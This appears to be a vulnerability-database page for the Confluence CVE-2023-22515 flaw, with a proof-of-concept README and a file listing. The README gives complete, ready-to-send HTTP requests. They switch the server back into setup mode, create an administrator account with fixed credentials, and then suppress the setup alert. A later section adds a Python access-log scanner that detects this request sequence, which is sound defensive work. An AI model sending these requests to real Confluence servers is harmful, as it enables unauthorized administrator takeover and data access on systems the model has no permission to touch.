Associated Vulnerability
Title: Atlassian Confluence Server security vulnerability (CVE-2023-22515)
Description: Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Description
NSE script to check if app is vulnerable to cve-2023-22515
Readme
# CVE-2023-22515
This describes the exploitation logic of the vulnerability, using Burp Suite.
To exploit it, the value of the attribute `bootstrapStatusProvider.applicationConfig.setupComplete` must be changed to `false`, that is, the following request must be sent:
### Endpoint that switches Confluence into setup mode:
```burp
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=77149CD086735B59F8F7FBE253D563AC
Upgrade-Insecure-Requests: 1
Priority: u=1
```
This lets us trigger the server's initial setup, which in turn makes it possible to create accounts with administrator rights.
### Payload for creating an account with administrator rights:
```burp
POST /setup/setupadministrator.action HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
X-Atlassian-Token: no-check
Content-Length: 137
Content-Type: application/x-www-form-urlencoded

username=not_xorbbo&fullName=NotXorbbo&email=not.xorbbo%40localhost&password=PasswordAnim3&confirm=PasswordAnim3&setup-next-button=Next
```
After exploiting the vulnerability, it is recommended to send a POST request to turn off the alert about completing the Confluence configuration:
### Disabling the alert:
```burp
POST /setup/finishsetup.action HTTP/1.1
Host: 192.168.1.37:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
X-Atlassian-Token: no-check
Referer: http://192.168.1.37:8090/setup/setupadministrator.action
```
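For defenders, the three requests shown above leave a recognizable sequence in the web access log: the `setupComplete` parameter override followed by POSTs to `/setup/*.action`. The following is an added example, not part of the original README or the NSE script, that scans access-log lines for that sequence per client IP; the log format, the indicator names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Common/combined access-log format (assumed; adapt to your access log pattern).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SETUP_PARAM = "bootstrapstatusprovider.applicationconfig.setupcomplete"
SETUP_PATH_RE = re.compile(r"^/setup/[^/]+\.action$", re.IGNORECASE)

def classify(method, target):
    """Return the indicator names matched by one request (names are decoded first)."""
    parts = urlsplit(target)
    path = unquote(parts.path).split(";", 1)[0]  # drop a ;jsessionid=... suffix
    hits = set()
    for pair in parts.query.split("&"):
        if unquote(pair.split("=", 1)[0]).lower() == SETUP_PARAM:
            hits.add("setup_flag_override")
    if SETUP_PATH_RE.match(path):
        hits.add("setup_action_post" if method == "POST" else "setup_action_access")
    return hits

def scan(lines):
    """Return {client_ip: [(timestamp, indicator, status), ...]} in log order."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for hit in sorted(classify(m["method"], m["target"])):
                findings[m["ip"]].append((m["ts"], hit, int(m["status"])))
    return dict(findings)

def high_confidence(findings):
    """IPs that overrode the setup flag and afterwards POSTed to a /setup/ action."""
    def hit(kinds):
        return ("setup_flag_override" in kinds and
                "setup_action_post" in kinds[kinds.index("setup_flag_override"):])
    return sorted(ip for ip, ev in findings.items() if hit([k for _, k, _ in ev]))

# Constructed sample lines (documentation IP ranges, not from a real system).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2023:09:14:01 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:09:14:05 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 200 8123',
    '203.0.113.7 - - [10/Oct/2023:09:14:09 +0000] "POST /setup/finishsetup.action HTTP/1.1" 200 301',
    '198.51.100.20 - - [10/Oct/2023:09:15:00 +0000] "GET /dashboard.action HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    print(high_confidence(scan(SAMPLE)))
```

Any hit on an instance whose setup was completed long ago is worth following up with a review of the administrator group for accounts nobody recognizes.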
File Snapshot
[4.0K] /data/pocs/ba4b7673fa02f54620b7877f6b39ee02870b29b8
├── [1.2K] cve-2023-22515.nse
└── [2.6K] README.md
0 directories, 2 files